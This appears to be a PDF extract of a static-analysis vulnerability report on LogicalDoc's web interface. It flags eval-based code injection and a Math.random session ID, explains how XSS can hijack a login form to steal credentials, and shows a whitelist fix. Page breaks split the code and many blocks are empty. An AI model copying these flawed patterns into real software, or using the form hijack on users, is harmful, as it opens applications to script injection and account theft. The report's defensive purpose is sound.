2402return internalKey},countKey:"storedEntryCount__",keyKey:"storedKeyBytes__",valueKey:"storedValueBytes__",updateMetrics:function(mode,key,value,oldValue){var realKey=this.KEY_PREFIX+key,storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;if(mode=="remove"){var item=this.get(key);if(item!=null){storedEntries--;storedKeyBytes-=realKey.length;storedValueBytes-=item.length}}else{if(oldValue==null){storedEntries++;storedKeyBytes+=realKey.length;storedValueBytes+=value.length}else{storedValueBytes+=value.length-oldValue.length}}2403this.$788(this.countKey,storedEntries);this.$788(this.keyKey,storedKeyBytes);this.$788(this.valueKey,storedValueBytes)},rebuildMetrics:function(){var pq=this.getPriorityQueue(),entries=0,keyBytes=0,valueBytes=0;for(var i=0;i<pq.length;i++){var value=this.get(pq[i]);entries++;keyBytes+=pq[i].length;valueBytes+=value.length}2404this.$788(this.countKey,entries);this.$788(this.keyKey,keyBytes);this.$788(this.valueKey,valueBytes)},getStorageMetrics:function(){var storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0,countLen=0,keyLen=0,valueLen=0;if(storedEntries)countLen=storedEntries.length;if(storedKeyBytes)keyLen=storedKeyBytes.length;if(storedValueBytes)valueLen=storedValueBytes.length;storedEntries=1*storedEntries;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;var pqText=this.get(this.priorityQueueKey);var overhead=this.countKey.length+this.keyKey.length+this.valueKey.length+countLen+keyLen+valueLen;var 
pqLength=pqText==null?0:pqText.length+(this.KEY_PREFIX+this.priorityQueueKey).length;return{storedEntries:storedEntries,storedKeyBytes:storedKeyBytes,storedValueBytes:storedValueBytes,metricsOverhead:overhead,priorityQueue:pqLength,total:storedKeyBytes+storedValueBytes+overhead+pqLength}},getTotalStorageUsed:function(){var metrics=this.getStorageMetrics();return metrics.storedKeyBytes+metrics.storedValueBytes+metrics.metricsOverhead+metrics.priorityQueue},storeResponse:function(dsRequest,dsResponse){var ts=new Date().getTime();dsResponse.offlineTimestamp=ts;var trimmedRequest=this.trimRequest(dsRequest),key=this.serialize(trimmedRequest),value=this.serialize(this.trimResponse(dsResponse));this.logDebug("storeResponse serializing: "+(new Date().getTime()-ts)+"ms");if(this.get(key)==null){if(this.getSCStoredValuesCount()>=this.maxResponsesToPersist){this.removeOldestEntry()}}2405this.put(key,value)},trimRequest:function(dsRequest){var keyProps=["dataSource","operationType","operationId","textMatchStyle","values","sortBy","startRow","endRow","data"],trimmed={},undef;for(var i=0;i<keyProps.length;i++){if(dsRequest[keyProps[i]]!==undef){trimmed[keyProps[i]]=dsRequest[keyProps[i]]}}2406return trimmed},trimResponse:function(dsResponse){var keyProps=["dataSource","startRow","endRow","totalRows","data","offlineTimestamp","status","errors","invalidateCache","cacheTimestamp"],trimmed={},undef;for(var i=0;i<keyProps.length;i++){if(dsResponse[keyProps[i]]!==undef){trimmed[keyProps[i]]=dsResponse[keyProps[i]]}}

2407return trimmed},getResponse:function(dsRequest){var trimmedRequest=this.trimRequest(dsRequest),key=this.serialize(trimmedRequest),value=this.get(key),returnValue;eval('returnValue = '+value);if(returnValue)returnValue.fromOfflineCache=true;return returnValue},serialize:function(obj){return isc.Comm.serialize(obj,false)},showStorageInfo:function(){if(!this.storageBrowser){if(isc.Offline.localStorageType()==isc.Offline.USERDATA_PERSISTENCE){isc.Timer.setTimeout(function(){isc.say("WARNING:  This browser uses an old storage mechanism that does not permit arbitrary key/value pair storage.  This means we have to store extra management data, with the upshot that the metrics reported for 'priority queue' and 'overhead' are indicative, but not accurate")},0)}2408this.metricsDF=isc.DynamicForm.create({width:"100%",numCols:6,fields:[{name:"storedEntries",title:"No. entries",disabled:true},{name:"storedKeyBytes",title:"Used by keys",disabled:true},{name:"storedValueBytes",title:"Used by values",disabled:true},{name:"priorityQueue",title:"Used by Priority Queue",disabled:true},{name:"metricsOverhead",title:"Metrics overhead",disabled:true},{name:"total",title:"Total Bytes",disabled:true}]});this.storageLG=isc.ListGrid.create({width:"100%",height:"*",canRemoveRecords:true,removeData:function(record){isc.ask("Remove this entry?",function(value){if(value){isc.Offline.remove(record.key);isc.Offline.refreshStorageInfo()}})},rowDoubleClick:function(record){isc.Offline.createStorageEditorWindow();isc.Offline.storageEditorWindow.show();isc.Offline.storageEditor.editRecord(record)},fields:[{name:"key",width:"25%",title:"Key"},{name:"value",title:"Value"}]});this.storageBrowser=isc.Window.create({autoCenter:true,canDragResize:true,width:Math.floor(isc.Page.getWidth()*0.5),height:Math.floor(isc.Page.getHeight()*0.5),title:"Offline 
Storage",items:[this.metricsDF,this.storageLG,isc.HLayout.create({width:"100%",height:1,members:[isc.LayoutSpacer.create({width:"*"}),isc.Button.create({title:"Add Entry",click:function(){isc.Offline.createStorageEditorWindow();isc.Offline.storageEditorWindow.show();isc.Offline.storageEditor.editNewRecord()}})]})]})}2409this.storageBrowser.show();this.refreshStorageInfo()},createStorageEditorWindow:function(){if(!isc.Offline.storageEditorWindow){isc.Offline.storageEditor=isc.DynamicForm.create({fields:[{name:"key",title:"Key",editorType:"TextAreaItem",width:400},{name:"value",title:"Value",editorType:"TextAreaItem",width:400},{name:"saveButton",type:"button",title:"Save",click:function(){var form=isc.Offline.storageEditor;if(form.saveOperationType=="update"&&form.getValue("key")!=form.getOldValue("key"))2410{isc.ask("Key has changed - this will create a new entry. Do you want to retain the old entry as well? (if you answer 'No', it will be removed",function(value){if(value===false){isc.Offline.remove(form.getOldValue("key"))}2411if(value!=null){isc.Offline.put(form.getValue("key"),form.getValue("value"));isc.Offline.storageEditorWindow.hide();isc.Offline.refreshStorageInfo()}})}else{isc.Offline.put(form.getValue("key"),form.getValue("value"));isc.Offline.storageEditorWindow.hide();isc.Offline.refreshStorageInfo()}}}]});isc.Offline.storageEditorWindow=isc.Window.create({bodyProperties:{margin:5},title:"Edit Offline Storage Entry",isModal:true,autoCenter:true,height:280,width:480,items:[isc.Offline.storageEditor]})}},refreshStorageInfo:function(){this.metricsDF.editRecord(isc.Offline.getStorageMetrics());var dataObj=isc.Offline.getCacheContents();var data=[];for(var key in dataObj){data.add({key:key,value:dataObj[key]})}2412this.storageLG.setData(data)}};var UserDataPersistence={isInitialized:false,poolSize:10,keyIndexKey:"keyIndex",reverseKeyIndexKey:"reverseKeyIndex",init:function(){this.userDataSpan=[];for(var 
i=0;i<this.poolSize;i++){this.userDataSpan[i]=document.createElement('span');this.userDataSpan[i].ID='isc_userData_'+i;this.userDataSpan[i].style.behavior='url(#default#userdata)';document.body.appendChild(this.userDataSpan[i]);this.userDataSpan[i].load("isc_userData_"+i)}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_History.js
Code:

52return _1}})}53isc.Browser.$1689=(!!document.createElementNS&&"contains"in document.createElementNS("http://www.w3.org/2000/svg","svg"));if(!isc.Browser.$1689&&window.SVGElement!=null){SVGElement.prototype.contains=function(_1){for(;_1!=null;_1=_1.parentNode){if(this===_1)return true}54return false}}55isc.Browser.$1560=("placeholder"in document.createElement("input")&&"placeholder"in document.createElement("textarea"));isc.Browser.$158n=isc.Browser.isMobileWebkit&&"webkitMaskBoxImage"in document.documentElement.style;isc.Browser.$162m=(window.screen!=null&&"orientation"in screen&&"type"in screen.orientation);isc.Browser.$165v=(!isc.Browser.isSafari&&!isc.Browser.isChrome&&!!document.createElementNS&&"getIntersectionList"in document.createElementNS("http://www.w3.org/2000/svg","svg")&&"createSVGRect"in document.createElementNS("http://www.w3.org/2000/svg","svg"));isc.Browser.$1691=(window.JSON!=null&&typeof window.JSON.parse==="function"&&typeof window.JSON.stringify==="function"&&window.JSON.stringify("\u0013")==="\"\\u0013\"");isc.Browser.canUseAggressiveGridTimings=!isc.Browser.isAndroid;isc.Browser.useHighPerformanceGridTimings=window.isc_useHighPerformanceGridTimings==null?

isc.Browser.canUseAggressiveGridTimings:window.isc_useHighPerformanceGridTimings&&isc.Browser.canUseAggressiveGridTimings;if(isc.addProperties==null){isc.addGlobal("addProperties",function(_1,_2){for(var _3 in _2)56_1[_3]=_2[_3];return _1})}57isc.addGlobal("evalSA",function(_1){if(isc.eval)isc.eval(_1);else eval(_1)});isc.addGlobal("defineStandaloneClass",function(_1,_2){if(isc[_1]){if(_1=="FileLoader"&&isc.FileLoader.$139n){isc[_1]=null}else{return}}58isc.addGlobal(_1,_2);isc.addProperties(_2,{$i:_1,fireSimpleCallback:function(_6){_6.method.apply(_6.target?_6.target:window,_6.args?_6.args:[])},logMessage:function(_6,_7,_8){if(isc.Log){isc.Log.logMessage(_6,_7,_8);return}59if(!isc.$j)isc.$j=[];isc.$j[isc.$j.length]={priority:_6,message:_7,category:_8,timestamp:new Date()}},logError:function(_6){this.logMessage(2,_6,this.$i)},logWarn:function(_6){this.logMessage(3,_6,this.$i)},logInfo:function(_6){this.logMessage(4,_6,this.$i)},logDebug:function(_6){this.logMessage(5,_6,this.$i)},$102q:function(_6,_7){if(!_6){throw(_7||"assertion failed")}},isAString:function(_6){if(isc.isA)return isc.isA.String(_6);return typeof _6=="string"},isAnArray:function(_6){if(isc.isA)return isc.isAn.Array(_6);return typeof _6=="array"},$ez:new RegExp("'","g"),$e0:new RegExp("\"","g"),$138c:function(_6,_7){if(!this.isAString(_6))_6=String(_6);var _3=_7?this.$ez:this.$e0,_4=_7?"'":'"';return _4+_6.replace(/\\/g,"\\\\").replace(_3,'\\'+_4).replace(/\t/g,"\\t").replace(/\r/g,"\\r").replace(/\n/g,"\\n").replace(/\u2028/g,"\\u2028").replace(/\u2029/g,"\\u2029")+_4},$138j:function(_6,_7){if(!this.isAString(_6))_6=String(_6);var s=_6.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/(\r\n|\r|\n) /g,"<BR>&nbsp;").replace(/(\r\n|\r|\n)/g,"<BR>").replace(/\t/g,"&nbsp;&nbsp;&nbsp;&nbsp;");return(_7?s.replace(/ /g,"&nbsp;"):s.replace(/  /g," &nbsp;"))}});_2.isAn=_2.isA;return 
_2});isc.defineStandaloneClass("SA_Page",{$l:(isc.Page&&isc.Page.isLoaded())||false,$m:[],isLoaded:function(){return this.$l},onLoad:function(_1,_2,_3){this.$m.push({method:_1,target:_2,args:_3});if(!this.$n){this.$n=true;if((isc.Browser.isIE&&isc.Browser.version<11)||isc.Browser.isOpera){window.attachEvent("onload",function(){isc.SA_Page.$o()})}else{window.addEventListener("load",function(){isc.SA_Page.$o()},true)}}},$o:function(){if(!window.isc||this.$l)return;this.$l=true;for(var i=0;i<this.$m.length;i++){var _2=this.$m[i];this.fireSimpleCallback(_2)}60delete this.$m}});if(!isc.SA_Page.isLoaded()){isc.SA_Page.onLoad(function(){this.$l=true},isc.SA_Page)}61isc.defineStandaloneClass("History",{$138g:[],$138h:1,registerCallback:function(_1,_2,_3){if(_1==null){if(!_3)this.unregisterCallback(0);return-1}62var _4;if(_3){_4=this.$138h++}else{this.unregisterCallback(0);_4=0}

File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_Core.js
Code:

1982if(_2)isc.Class.fireCallback(_2,"categories",[_3]);return _3},isc.A.getLogCategoryData=function isc_DebugTarget_getLogCategoryData(_1,_2){var _3=(_1?isc.Log.getLogPriorities(_1,true):null),_4=this.getLogCategories(_1),_5=isc.Log;var _6=[],_7;for(var i=0;i<_4.length;i++){var _9=_4[i];if(_1){if(_9==isc.Log._allCategories)continue;else if(_9==isc.Log.$fs){_7=window[_1].getDefaultLogPriority();continue}}1983var _10=_5.getPriority(_9,_1);var _11=this.DEFAULT_CATEGORIES.findIndex("name",_9);var _12;if(_11!=-1)_12=this.DEFAULT_CATEGORIES[_11].description;_6.add({category:_9,description:_12,priority:_10||_5.defaultPriority,custom:_3&&_3[_9]!=null})}1984_6.add({category:"[default]",priority:(_7||_5.defaultPriority),custom:(_7?true:false)});this.fireCallback(_2,"categoryData",[_6])},isc.A.generateLogMenuItems=function isc_DebugTarget_generateLogMenuItems(_1,_2,_3){var _4=this.getLogCategories(),_5=[],_6=[];var _7=Math.min(_4.length,_2);for(var i=0;i<_7;i++){var _9=_4[i];var _10=isc.Log.getPriority(_9,_1);if(_10==null)_10=isc.Log.getDefaultPriority();_6.add({title:_9,selectedLevel:_10,category:_9,addPrioritiesSubmenu:true,enableIf:"menu.allCategoriesOverride() == null"})}1985_6.add({isSeparator:true});_6.add({title:"[default]",category:"$fs",addPrioritiesSubmenu:true,selectedLevel:isc.Log.getDefaultPriority(_1),enableIf:"menu.allCategoriesOverride() == null"})1986_6.add({title:"More...",click:"menu.setCustomLogPriorities()"});_5=_6.duplicate();_6=_1!=null?_5:_6;for(var i=0;i<_6.length;i++){var _11=_6[i],_9=_11.category;if(_9){var _12=isc.Log.getPriority(_9,_1),_13=(_12>isc.Log.WARN?"color:blue;":null);if(_13!=_11.cssText){_11.cssText=_13}}}1987this.fireCallback(_3,"menuItems",[_6])},isc.A.getGlobalLogCookie=function isc_DebugTarget_getGlobalLogCookie(_1){var _2=isc.LogViewer.getGlobalLogCookie();if(_2==null)_2={};_2.priorityDefaults=isc.Log.getLogPriorities();_2.defaultPriority=isc.Log.defaultPriority;if(_1)this.fireCallback(_1,"globalLogCookie",

[_2]);return _2},isc.A.set=function isc_DebugTarget_set(_1,_2,_3){var _1=isc.Class.globalEvalWithCapture(_1+"="+_2);if(_3)this.fireCallback(_3,"lValue",[eval(_1)])},isc.A.get=function isc_DebugTarget_get(_1,_2){this.fireCallback(_2,"value",[eval(_1)])});isc.B._maxIndex=isc.C+30;isc.defineClass("DebugFocus").addClassProperties({hideTimeout:2000,opacityMax:75,opacityMin:50,oscillationFrequency:2000,showFocus:function(){if(this.$ke&&this.$ke.isVisible()){this.clearHideTimer();this.setHideTimer();return}1988if(!this.$ke){this.$ke=isc.Canvas.create({width:"100%",height:"100%",overflow:"hidden",backgroundColor:"#4169E1",hideUsingDisplayNone:true})}1989var _1=this.$ke;_1.setOpacity(this.opacityMin);_1.show();_1.bringToFront();this.setHideTimer();this.startFadeInAnimation()},clearFocus:function(){this.clearHideTimer();this.hideFocus()},startFadeOutAnimation:function(){this.$ke.cancelAnimation(this.fadeAnimationID);this.fadeAnimationID=this.$ke.animateFade(this.opacityMin,"isc.DebugFocus.startFadeInAnimation()",this.oscillationFrequency/2,"smoothStart")},startFadeInAnimation:function(){this.$ke.cancelAnimation(this.fadeAnimationID);this.fadeAnimationID=this.$ke.animateFade(this.opacityMax,"isc.DebugFocus.startFadeOutAnimation()",this.oscillationFrequency/2,"smoothStart")},hideFocus:function(){if(this.$ke!=null){this.$ke.cancelAnimation(this.fadeAnimationID);this.$ke.hide()}},clearHideTimer:function(){if(this.$144p!=null){isc.Timer.clearTimeout(this.$144p);delete this.$144p}},setHideTimer:function(){this.$144p=isc.Timer.setTimeout("isc.DebugFocus.hideFocus()",this.hideTimeout)}});isc.defineClass("RemoteDebug").addClassProperties({isEnabled:false,modulesDir:"system/development/",getUniqueChannelName:function(){return navigator.userAgent},conditionallyEnable:function(){this.logDebug("conditionally enabling debug");if(window.isc_remoteDebug&&isc.Browser.isMobile){this.enable()}else 
if(isc.params["isc_remoteDebug"]=="true"){this.enable()}},requiredModules:["RealtimeMessaging"],loadRequiredModules:function(_1){var _2=this;isc.FileLoader.ensureLoaded(function(){var _3=isc.FileLoader.modulesDir;isc.FileLoader.modulesDir=_2.modulesDir1990isc.FileLoader.loadModules(_2.requiredModules,function(){isc.FileLoader.modulesDir=_3;_2.fireCallback(_1)});isc.FileLoader.modulesDir=_3})},enable:function(_1){if(this.isEnabled){_2.fireCallback(_1)}1991if(!isc.hasOptionalModules("SCServer")){alert("Remote debugging requires a Pro or better license.");return}1992if(!isc.Log.logViewer)isc.Log.logViewer=isc.LogViewer.create();var _2=this;this.loadRequiredModules(function(){isc.debugTarget=isc.DebugTarget.create({});isc.debugTarget.start(function(){isc.debugTarget.sendTargetAvailableNotify();_2.isEnabled=true;_2.logInfo("Remote debug enabled");_2.fireCallback(_1)})})},enableLocal:function(_1){if(isc.debugTarget){isc.debugTarget.debugDisable()}

File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_Core.js
Code:


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_Core.js
Code:


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_Core.js
Code:


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_Core.js
Code:


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_Core.js
Code:


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_Core.js
Code:

File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_DataBinding.js
Code:


Page 124: Report on found vulnerabilities - InfoWatch...4 The report on detected vulnerabilities FILES Java: Defending against Cross-site Request Forgery using GWT Severity: high Language: Java

124 The report on detected vulnerabilities FILES

=form.getOldValue("key"))2477{isc.ask("Key has changed - this will create a new entry. Do you want to retain the old entry as well? (if you answer 'No', it will be removed",function(value){if(value===false){isc.Offline.remove(form.getOldValue("key"))}2478if(value!=null){isc.Offline.put(form.getValue("key"),form.getValue("value"));isc.Offline.storageEditorWindow.hide();isc.Offline.refreshStorageInfo()}})}else{isc.Offline.put(form.getValue("key"),form.getValue("value"));isc.Offline.storageEditorWindow.hide();isc.Offline.refreshStorageInfo()}}}]});isc.Offline.storageEditorWindow=isc.Window.create({bodyProperties:{margin:5},title:"Edit Offline Storage Entry",isModal:true,autoCenter:true,height:280,width:480,items:[isc.Offline.storageEditor]})}},refreshStorageInfo:function(){this.metricsDF.editRecord(isc.Offline.getStorageMetrics());var dataObj=isc.Offline.getCacheContents();var data=[];for(var key in dataObj){data.add({key:key,value:dataObj[key]})}2479this.storageLG.setData(data)}};var UserDataPersistence={isInitialized:false,poolSize:10,keyIndexKey:"keyIndex",reverseKeyIndexKey:"reverseKeyIndex",init:function(){this.userDataSpan=[];for(var i=0;i<this.poolSize;i++){this.userDataSpan[i]=document.createElement('span');this.userDataSpan[i].ID='isc_userData_'+i;this.userDataSpan[i].style.behavior='url(#default#userdata)';document.body.appendChild(this.userDataSpan[i]);this.userDataSpan[i].load("isc_userData_"+i)}

File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_DataBinding.js
Code:


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_DataBinding.js
Code:


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_DataBinding.js
Code:


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_DataBinding.js
Code:


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_DataBinding.js
Code:


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_DataBinding.js
Code:


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_DataBinding.js
Code:


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_DataBinding.js
Code:


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_FileLoader.js
Code:


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_Tools.js
Code:


Incorrect User Input Filtration when Generating Code on the Fly

This vulnerability occurs when the application does not properly filter external data before passing it to an API that generates and executes code. As a result, an attacker can craft input that forces the application to perform actions the developer did not account for.

Example

Typical use of eval involves trying to set dynamic properties or invoke dynamic methods on objects. A typical eval statement thus looks something like:

JavaScript

eval("user." + propertyName + " = '" + propertyValue + "'"); // Set property with dynamic name
eval("user." + methodName + "()"); // Invoke method dynamically

The program behaves correctly when the propertyName or methodName parameters contain valid identifiers. However, if an attacker specifies values that are both syntactically valid and malicious, those operations are executed on the client side, so the attacker can use this vulnerability to perform a cross-site scripting attack [1].

Potential consequences

In general, this vulnerability allows a malicious user to perform any action in the vulnerable application while posing as the user who opened the page with the injected JavaScript code. Often, the target of an XSS attack is the user's account data: information stored in cookies, as well as the login and password intercepted by modifying the web application's authorization form. The injected JavaScript code changes the action attribute of the authorization form so that it points to the malicious user's server.

Removal recommendations

During script generation, we recommend against using parameters that rely on the environment, such as user input, files from non-restricted sources, cookies, hidden form fields, etc.

• Assume that all data coming from the client is a potential threat, including hidden form fields and cookies. We recommend the “accept known good” approach to input filtering: a whitelist that describes the acceptable input format. All input that does not match the whitelisted format should be either rejected or sanitized. For script calls, use a strict list of the characters allowed in the parameter.

• For example, if the expected input is an integer, validation should reduce any input to an integer type.

• Whitelist-based input validation alone cannot guarantee security. If the expected input may contain escape characters, operators or scripting-language commands, further processing is necessary, such as escaping or encoding.

• Using the eval function is dangerous in any case, since it executes any code passed to it. We recommend against using it. If there is no alternative, check the input data thoroughly.
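An added example (not code from the report or from LogicalDoc) showing how the two eval calls from the example above can be replaced by whitelist validation plus bracket access, so that the client-supplied name is checked against known-good identifiers and the value is stored as data rather than spliced into source text. The names in ALLOWED_PROPERTIES and ALLOWED_METHODS and the sample user object are assumptions for the demonstration.

```javascript
// Added example, not code from the report or from LogicalDoc: the eval-based
// dynamic property set / method call from the example above, rewritten so that
// untrusted names are checked against an explicit whitelist and the value is
// stored as data rather than spliced into generated source text.
// ALLOWED_PROPERTIES / ALLOWED_METHODS are assumed names for this demonstration.

// Syntactic check: a single identifier, nothing that could close a quoted
// string or start a new statement if the name were used in generated code.
const IDENTIFIER = /^[A-Za-z_$][A-Za-z0-9_$]*$/;

// "Accept known good": only these names may be set or called by the client.
const ALLOWED_PROPERTIES = new Set(["displayName", "email", "locale"]);
const ALLOWED_METHODS = new Set(["refresh", "logout"]);

function isAllowedName(name, allowed) {
  return typeof name === "string" && IDENTIFIER.test(name) && allowed.has(name);
}

function assertAllowedName(name, allowed) {
  if (!isAllowedName(name, allowed)) {
    throw new Error("rejected name: " + JSON.stringify(name));
  }
  return name;
}

// Replacement for eval("user." + propertyName + " = '" + propertyValue + "'").
// Bracket access never parses propertyValue, so quotes, semicolons or
// markup inside it are stored verbatim and cannot execute.
function setUserProperty(user, propertyName, propertyValue) {
  const name = assertAllowedName(propertyName, ALLOWED_PROPERTIES);
  user[name] = String(propertyValue);
  return user;
}

// Replacement for eval("user." + methodName + "()"). The whitelist also keeps
// inherited names such as "constructor" or "__proto__" out of reach.
function invokeUserMethod(user, methodName) {
  const name = assertAllowedName(methodName, ALLOWED_METHODS);
  if (typeof user[name] !== "function") {
    throw new Error("not a callable method: " + name);
  }
  return user[name]();
}

// Constructed sample object standing in for the page's `user`.
const sampleUser = {
  displayName: "Alice",
  email: "",
  refreshCount: 0,
  refresh() { this.refreshCount += 1; return "refreshed"; },
  logout() { return "logged out"; }
};

// Constructed inputs: one well-formed name, one that would break out of the
// quoted string in the eval-based original, one inherited (non-whitelisted) name.
const checks = {
  valid: isAllowedName("email", ALLOWED_PROPERTIES),
  breakout: isAllowedName("email'; bogus(); '", ALLOWED_PROPERTIES),
  inherited: isAllowedName("constructor", ALLOWED_METHODS)
};

setUserProperty(sampleUser, "email", "alice@example.test");
console.log(checks, sampleUser.email, invokeUserMethod(sampleUser, "refresh"));
```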


JavaScript: Using Insufficiently Random Generators in Cryptography
Severity: low
Language: JavaScript
Short description: Standard pseudorandom number generators are easily predictable, which weakens the application's cryptographic protection.
Full description: https://localhost:443/scanner/article?articleName=/en/JavaScript/CryptoInsecureRandomness.html

Found Vulnerabilities:
File name: logicaldoc/logicaldoc-gui/war/login/hosted.html
Code:

250    var ASCII_EXCLAMATION = 33;
251    var ASCII_TILDE = 126;
252    var chars = [];
253    for (var i = 0; i < 16; ++i) {
254      chars.push(Math.floor(ASCII_EXCLAMATION
255          + Math.random() * (ASCII_TILDE - ASCII_EXCLAMATION + 1)));
256    }
257    topWin.__gwt_SessionID = String.fromCharCode.apply(null, chars);
258  }
259  var plugin = null;
260  for (var i = 0; i < pluginFinders.length; ++i) {

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_Core.js
Code:


File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_Core.js
Code:


File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_Core.js
Code:

value with the specified <i>base</i>",usage:"log(base, value)",defaultSortPosition:17,jsFunction:function(_1,_2){return Math.log(_2)/Math.log(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"asin",description:"Arcsine of a value",usage:"asin(value)",defaultSortPosition:18,jsFunction:function(_1){return Math.asin(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"acos",description:"Arccosine of a value",usage:"acos(value)",defaultSortPosition:19,jsFunction:function(_1){return Math.acos(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"atan",description:"Arctangent of a value (-PI/2 to PI/2 radians)",usage:"atan(value)",defaultSortPosition:20,jsFunction:function(_1){return Math.atan(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"atan2",description:"Angle theta of a point (-PI to PI radians)",usage:"atan2(value1,value2)",defaultSortPosition:21,jsFunction:function(_1,_2)

Page 137: Report on found vulnerabilities - InfoWatch...4 The report on detected vulnerabilities FILES Java: Defending against Cross-site Request Forgery using GWT Severity: high Language: Java

137 The report on detected vulnerabilities FILES

{return Math.atan2(_1,_2)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"exp",description:"The value of E<sup>value</sup>",usage:"exp(value)",defaultSortPosition:22,jsFunction:function(_1){return Math.exp(_1)}}));isc.MathFunction.registerFunction(isc.MathFunction.create({name:"random",description:"Random number between 0 and 1",usage:"random()",defaultSortPosition:23,jsFunction:function(){return Math.random()}}));isc.Canvas.registerStringMethods({userAddedField:"field",selectionUpdated:"record,recordList",onFetchData:"criteria,requestProperties"});isc.defineClass("EdgedCanvas","Canvas");isc.A=isc.EdgedCanvas.getPrototype();isc.A.redrawOnResize=false;isc.A._redrawWithParent=false;isc.A.$jp=false;isc.A.$jo=false;isc.A.useClipDiv=false;isc.A.isSnapAlignCandidate=false;isc.A.overflow=isc.Browser.isMoz?isc.Canvas.VISIBLE:isc.Canvas.HIDDEN;isc.A.$ks=false;isc.A.$tb=0;isc.A.$td=0;isc.A.$tc=0;isc.A.$te=0;isc.A.$y0=["TL","T","TR","L","center","R","BL","B","BR"];isc.A.$98g={L:true,TL:true,BL:true};isc.A.$98h={R:true,TR:true,BR:true};isc.A.$920=["TR","T","TL","R","center","L","BR","B","BL"];isc.A.skinImgDir="images/edges/";isc.A.edgeImage="[SKIN]/rounded/frame/FFFFFF/6.png";isc.A.shownEdges={TL:true,T:true,TR:true,L:true,R:true,BL:true,B:true,BR:true};isc.A.edgeSize=6;isc.A=isc.EdgedCanvas.getPrototype();isc.B=isc._allFuncs;isc.C=isc.B._maxIndex;isc.D=isc._funcClasses;isc.D[isc.C]=isc.A.Class;isc.A.$61h="<TD class='";isc.A.$61i="' ></TD>";isc.A.$y2="<TABLE role='presentation' CELLPADDING='0' CELLSPACING='0' STYLE='height:100%;width:100%;table-layout:fixed'><COL WIDTH=";isc.A.$y3="><COL><COL WIDTH=";isc.A.$98i=["background-size:",,," ",,,";"];isc.A.$4n=" class=";isc.A.addEdgeStyleSuffix=false;isc.A.forceMozRowHeight=true;isc.B.push(isc.A.initWidget=function isc_EdgedCanvas_initWidget(){this.invokeSuper(isc.EdgedCanvas,this.$oc);var _1=this.customEdges;if(_1){var 
_2=this.shownEdges={};if(_1.contains("T")){_2.T=_2.TL=_2.TR=true}3741if(_1.contains("B")){_2.B=_2.BL=_2.BR=true}3742if(_1.contains("L")){_2.L=_2.TL=_2.BL=true}3743if(_1.contains("R")){_2.R=_2.TR=_2.BR=true}}3744this.updateEdgeSizes()},isc.A.updateEdgeSizes=function isc_EdgedCanvas_updateEdgeSizes(){var _1=this.edgeSize;this.$y4=this.$du(this.edgeLeft,_1);this.$y5=this.$du(this.edgeRight,_1);this.$y6=this.$du(this.edgeTop,_1);this.$y7=this.$du(this.edgeBottom,_1);var _2=this.shownEdges,_3=this.edgeOffset;if(_2.L)this.$tb=this.$du(this.edgeOffsetLeft,_3,this.$y4);if(_2.R)this.$tc=this.$du(this.edgeOffsetRight,_3,this.$y5);if(_2.T)this.$td=this.$du(this.edgeOffsetTop,_3,this.$y6);if(_2.B)this.$te=this.$du(this.edgeOffsetBottom,_3,this.$y7);this.markForRedraw()},isc.A.getInnerWidth=function isc_EdgedCanvas_getInnerWidth(_1,_2,_3){var _4=this.invokeSuper(isc.EdgedCanvas,"getInnerWidth",_1,_2,_3);return _4-this.$tb-this.$tc},isc.A.getInnerHeight=function isc_EdgedCanvas_getInnerHeight(_1,_2,_3){var _4=this.invokeSuper(isc.EdgedCanvas,"getInnerHeight",_1,_2,_3);return _4-this.$td-this.$te},isc.A.getInnerHTML=function isc_EdgedCanvas_getInnerHTML(){var _1=isc.SB.create(),_2=this.edgeImage,_3=_2.lastIndexOf(isc.dot),_4=_2.substring(0,_3),_5=_2.substring(_3),_6=this.getImgURL(_4),_7="<TD HEIGHT=",_8="<TD",_9,_10,_11;if(!isc.Browser.isIE10&&!isc.Browser.isEdge&&!((isc.Browser.isStrict&&isc.Browser.isIE&&isc.Browser.version>=8)||(isc.Browser.isMoz&&isc.Browser.isUnix)))3745{var _12=isc.EdgedCanvas.$y8;if(!_12){_12=isc.EdgedCanvas.$y8={width:"100%",height:"100%"};if(isc.Browser.isSafari)_12.align="middle";if(isc.Browser.isStrict&&!isc.Browser.isTransitional){_12.extraCSSText="display:block"}

File name: logicaldoc/logicaldoc-gui/war/login/sc/modules/ISC_Core.js
Code:

635 _5.exp+=(-1*_1);return _5.normalize()}
